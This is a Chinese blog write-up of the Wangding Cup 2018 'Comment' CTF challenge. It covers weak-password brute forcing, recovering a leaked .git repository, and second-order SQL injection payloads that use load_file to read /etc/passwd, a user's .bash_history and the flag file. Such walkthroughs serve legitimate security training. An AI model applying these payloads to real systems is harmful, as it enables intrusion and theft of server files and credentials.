[网鼎杯 2018]Comment -----不会编程的崽

于 2024-03-25 07:00:00 发布
阅读量1k 收藏 6
点赞数 18
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/daimakunnanhu/article/details/136976480
版权

网鼎杯的题啊,每次都能记忆犹新,又get到了不少。

这种发帖的界面在ctf中不少见了,多半是二次注入。但是这个二次注入并不单纯。在一道大坎之前,必定存在小坎。这不,先登录。

 先别急着怀疑是否为其他漏洞。仔细观察,它已经给你账号密码了,但是密码隐藏了三位。没错,就是弱口令。还说什么,上bp呗。这里我也不截图了,密码zhangwei666。可以开始发帖了。可能测试了很久,都开始怀疑是否是二次注入了。所以怀疑一下有没有源码泄露吧。

 工具是GitHacker

下载地址:https://github.com/WangYihang/GitHacker
命令:
githacker --url http://3a974107-6486-4a22-a4d7-e2de15b8e8cd.node5.buuoj.cn:81/.git/ --output-folder ./

   获取到write_do.php。给了一堆似懂非懂的代码。反正我做这时我不知道,大佬说代码缺少。使     用以下命令恢复

首先:git log --reflog
得到:commit e5b2a2443c2b6d395d06960123142bc91123148c (refs/stash) 有很多的这种的,从第一个一个试
然后:git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c 成功恢复内容

 源码如下:

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

一般泄露源码的题,就不可能是常规注入。

write指发帖,comment指发送评论。write下边,所有可控制的值被addslashes转义了。但是comment下边,它把category值重新选取出来,并且没有进行过滤就带入了sql语句。很明显,这就是我们要找的注入点。这里注入就一定要绕过单引号。接下来就是巧妙构造

payload:title=111&CATEGORY=1',content=database(),/*&content=111

我们把这个带入源码,看下怎么个事??

$sql = "insert into comment
        set category = '1',content=database(),/*',
            content = '111',
            bo_id = '$bo_id'";

即使在write下单引号被转义。但是那个单引号再次被数据库选出来时,奇迹般的复活了,它又恢复了单引号的特殊含义。 现在category='1',content=database()。/*是php的注释符,将后边的引号注释掉。但是这么注释存在问题,我们构造了一个content,当然/*也要闭合掉一个content。content是评论的内容。在评论区提交*/#会怎样?带进去看看

$sql = "insert into comment
        set category = '1',content=database(),/*',
            content = '*/#',
            bo_id = '$bo_id'";

 /**/形成闭合后,因为是php代码,现在只会执行以下代码

$sql = "insert into comment
        set category = '1',
            content=database(),
            #',
            bo_id = '$bo_id'";

引号就完美绕开了。在带入sql语句执行。那么评论的内容就会变为数据库的名字

 

 数据库的名字就显现了。那接下来怎么办,如果真按照这个注入,脚本很难写,操作也很复杂。所以这里还是保留了人性奥。读取文件即可。接下来也是脑洞大开时刻。先读取/etc/passwd

paylaod:1',content=(select load_file('/etc/passwd')),/*

 发现存在www用户,去读取用户的命令执行历史

payload:1',content=(select load_file('/home/www/.bash_history')),/*

它把一个压缩包解压在tmp目录下,然后删除压缩包,又把html复制去了/www目录,并删除.DS_Store。搁着绕圈子了。那不还是得去读取/tmp/html/.DS_Store。又因为这种文件直接读取通常存在乱码,所以要转进制读取才行

payload:1',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

这样就读出来一堆16进制。拿去转换一下。看见flag名了-----flag_8946e1ff1ee3e40f.php

 

这里又有一个坑。假如还是去/tmp目录下读取flag,就会得到一个高仿的flag,比真实的长一点点。这里要去/var/www/html/flag_8946e1ff1ee3e40f.php才是真的。太坑了,也有点难呀,鼠鼠哭死了。

paylaod:
1',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

不会编程的崽
关注
  • 18
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网鼎杯 2018]Comment题解,超详细!
2202_75361164的博客
10-23 521
【代码】[网鼎杯 2018]Comment题解,超详细!思路加payload
[网鼎杯 2018]Comment(二次注入,git泄露,git恢复)
qq_45521281的博客
04-12 3102
进入题目是这样的 要发帖还必须登录 在这里已经给了你用户名并提示了密码;密码隐藏了后三位,我们可以用爆破爆破后面三位的方法: 由爆破状态码的密码后三位为666,登录进去就可以发帖了。接下来用dirsearch扫描,发现存在.git文件 那应该存在.git文件泄露,用GitHack下载发现有一个write_do.php,但是代码有缺失 查一下之前提交的版本,单独用git log不能全部显示,直...
[网鼎杯 2018]Comment
Sk1y的博客
01-14 508
文章目录[CSCCTF 2019 Qual]FlaskLight解题过程payload1payload2payload3参考文章[RCTF2015]EasySQL解题过程payload参考文章[HITCON 2017]SSRFme解题过程payload参考文章[网鼎杯 2018]Comment解题过程payload参考文章 [CSCCTF 2019 Qual]FlaskLight 解题过程 f12中提示,GET方式传参search可以判断ssti 查看所有子类 ?search={{''.__class_
[网鼎杯 2018]Comment_wp
lzu_lfl的博客
04-07 202
二次注入、.git源码泄漏、.git源码恢复、sql注入读文件
remark-comment-config:插件配置带注释的评论
05-10
npm install remark-comment-config 用 假设我们有以下文件example.md : <!-- remark bullet="+" --> - List item (this is a stringify setting) 我们的脚本example.js如下所示: var vfile = require ( ...
comment_css_flask-comment_
09-29
标题中的"comment_css_flask-comment_"表明这是一个与Python Flask框架相关的项目,主要涉及评论功能的实现,并且可能特别关注CSS(Cascading Style Sheets)在界面设计中的应用。Flask是一个轻量级的Web服务器网关...
商业编程-源码-XML 初级教程(二).zip
06-22
XML的基本结构由元素(Element)、属性(Attribute)、文本内容(Text Content)以及注释(Comment)等组成。元素是XML文档的核心,它们定义了数据的结构和内容。例如,`<book>`可以表示一本书,而`<title>`和`...
caozha-comment 原生PHP评论系统
08-14
caozha-comment是一个功能强大的评论系统,采用原生PHP编写,不依赖任何框架,特点:易上手,零门槛,界面清爽极简,极便于二次开发。可以自动适配电脑、平板和手机等不同客户端。caozha-comment安装使用:快速安装1...
caozha-comment(原生PHP评论系统)-PHP
06-21
caozha-comment更新方法:1.0.0升级到1.0.1的方法:1、执行下面MYSQL命令:ALTER TABLE cz_comment CHANGE addtime addtime DATETIME NULL DEFAULT NULL COMMENT '评论时间';2、将1.0.1版/SRC/目录的源文件覆盖旧...
BUUCTF之[网鼎杯 2018]Comment
m0_62107966的博客
09-15 914
BUUCTF之[网鼎杯 2018]Comment 输入:*/# sql语句是换行的,所以我们无法用 单行注释符,必须用/**/拼接,用#闭合sql语句使其执行。可以看到执行成功,返回ctf这个库。首先发帖的时候必须登录,爆破弱密码登录,得到666是满足的后三位密码的。是一个类似留言板的界面,考虑二次注入,并且有git源码泄露。接下来尝试sql语句注入都失败了,看了大佬的wp,用sql来读取文件。在cmment中,对于category的值从数据库取出来没有进行转义
[网鼎杯 2018]Comment 注入读取文件load_file
qq_54929891的博客
04-01 1484
记录一下做这道题的经历和思路 发帖的时候要进行账号登陆,里面暗示了账号以及部分密码,后面的三个***我们采用爆破来进行
网鼎杯 2018 comment
feng的博客
10-30 692
知识点 爆破弱密码 git泄露 二次注入 .bash_history WP 首先进入环境,是一个留言板的东西,而且按照题目描述的SQL,肯定又是SQL注入了。不过还不能直接留言,需要登录。登录就是爆破密码的后三位,爆出来是zhangwei666,然后登录。 如果提前用dirsearch扫了的话,会发现存在git泄露。利用工具弄下来,得到2个文件,那个关键的文件内容如下: <?php include "mysql.php"; session_start(); if($_SESSION['login'
网鼎杯 Comment 解题记录
weixin_44732566的博客
04-01 1802
网鼎杯 comment 2020年网鼎杯马上开始了,来做一下历年真题 打开题目 点击发帖-提交,跳转到一个登录界面,不过已经提升了用户名和密码 爆破后面三位,登录成功 登录进去就可以发帖了,但也不有想法,注入点试了不行,用dirsearch扫描,发现存在.git文件 那应该存在.git文件泄露,用GitHack下载发现有一个write_do.php,但是代码有缺失 查一下之前提交的版本,单独用gi...
网鼎杯2018 comment
weixin_44377940的博客
03-20 2077
本次知识点 git恢复文件 二次注入 git恢复文件 如何判断是否可以恢复? 看是否有commit文件,如果没有,则需要恢复,像这题: 可以看到,
buu-[网鼎杯 2018]Comment
qaq517384的博客
10-13 279
进入题目 发帖时提示要登录,密码用bp跑出来是666 然后这个发帖形式很像上一题的二次注入,先构造sql语句,后面在留言界面输出 稍微试了一下,有问题的都发不出留言 在f12控制台发现这样一句话后,在url后添加.git被403禁止了,说明有git泄露 githack载下来的源码跟没载一样 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./l
comment-httpclient表单
最新发布
06-10
如果你想使用 HttpClient 向服务器发送表单数据,可以通过以下步骤进行操作: 1. 创建一个 HttpClient 对象: ``` CloseableHttpClient httpClient = HttpClients.createDefault(); ``` 2. 创建一个 HttpPost 对象,并设置请求的 URL: ``` HttpPost httpPost = new HttpPost("http://example.com/form"); ``` 3. 创建一个 List\<NameValuePair\> 对象,并添加需要提交的表单数据: ``` List<NameValuePair> formParams = new ArrayList<>(); formParams.add(new BasicNameValuePair("username", "user")); formParams.add(new BasicNameValuePair("password", "pass")); ``` 4. 将表单数据添加到 HttpPost 对象中: ``` UrlEncodedFormEntity formEntity = new UrlEncodedFormEntity(formParams, "UTF-8"); httpPost.setEntity(formEntity); ``` 5. 执行请求并获取响应: ``` CloseableHttpResponse response = httpClient.execute(httpPost); ``` 6. 处理响应: ``` HttpEntity responseEntity = response.getEntity(); if (responseEntity != null) { String responseString = EntityUtils.toString(responseEntity); System.out.println(responseString); } ``` 以上就是使用 HttpClient 向服务器发送表单数据的基本步骤,你可以根据具体情况进行调整和扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值